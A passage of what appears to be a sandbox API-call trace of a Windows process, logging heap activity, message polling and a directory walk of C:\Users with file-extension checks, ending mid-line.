[0096.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fde0 [0096.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0096.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0096.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fde0 | out: hHeap=0x630000) returned 1 [0096.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fde0 [0096.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0096.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0096.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fde0 | out: hHeap=0x630000) returned 1 [0096.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fde0 [0096.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0096.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0096.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fde0 | out: hHeap=0x630000) returned 1 [0096.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fde0 [0096.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0096.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0096.995] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0096.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0096.995] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0096.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0096.996] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0096.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0096.996] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0096.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0096.996] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0096.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0096.996] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0096.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0096.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0096.996] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0096.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0096.996] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0096.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0096.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0096.996] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0096.996] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0096.997] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0096.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0096.997] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0096.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0096.997] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0096.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0096.997] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0096.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb10 [0096.997] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0096.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fde0 [0096.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0096.997] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0096.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0096.997] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0096.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0096.997] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0096.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0096.997] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0096.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.997] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0096.997] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.998] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.998] PathFindFileNameW (pszPath="") returned="" [0096.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.998] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0096.998] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0096.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0096.998] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0096.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0096.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd48 [0096.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0096.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0096.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.999] FreeLibrary (hLibModule=0x75670000) returned 1 [0096.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd48 | out: hHeap=0x630000) returned 1 [0096.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0096.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0096.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0096.999] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0096.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0096.999] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0096.999] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa1b2ca60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b2ca60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0096.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fde0 [0096.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb10 [0096.999] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb58 [0096.999] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fb10 | out: hHeap=0x630000) returned 1 [0097.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fde0 | out: hHeap=0x630000) returned 1 [0097.000] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0097.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0097.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0097.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0097.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0097.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0097.000] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0097.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0097.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0097.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0097.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0097.000] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0097.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0097.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0097.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0097.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0097.000] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0097.000] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0097.000] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0097.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0097.001] PathFindExtensionW (pszPath="C:\\Users\\desktop.ini") returned=".ini" [0097.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0097.001] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0097.001] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x498) returned 0x333a888 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd48 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330720 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302c0 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330860 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330900 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33307c0 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fed8 [0097.001] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330478 [0097.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fcd0 [0097.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330018 [0097.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330158 [0097.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0097.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332feb0 [0097.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330428 [0097.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fe38 [0097.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33306d0 [0097.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fcf8 [0097.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330388 [0097.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ffc8 [0097.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330680 [0097.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fde0 [0097.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33332b0 [0097.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3333208 [0097.002] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33332e8 [0097.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330888 | out: hHeap=0x630000) returned 1 [0097.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330748 | out: hHeap=0x630000) returned 1 [0097.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0097.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0097.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fe60 | out: hHeap=0x630000) returned 1 [0097.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33300e0 | out: hHeap=0x630000) returned 1 [0097.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0097.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330298 | out: hHeap=0x630000) returned 1 [0097.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330838 | out: hHeap=0x630000) returned 1 [0097.002] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304f0 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff78 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd70 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330590 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff50 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33307e8 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330658 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fe10 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33306f8 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304a0 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33301f8 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304c8 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330338 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fb58 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33172f8 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0097.003] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0097.003] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0097.003] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0097.003] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330220 | out: hHeap=0x630000) returned 1 [0097.004] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0097.004] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0097.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0097.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0097.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0097.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0097.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0097.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0097.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0097.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0097.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0097.004] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0097.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0097.004] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0097.004] RtlAllocateHeap 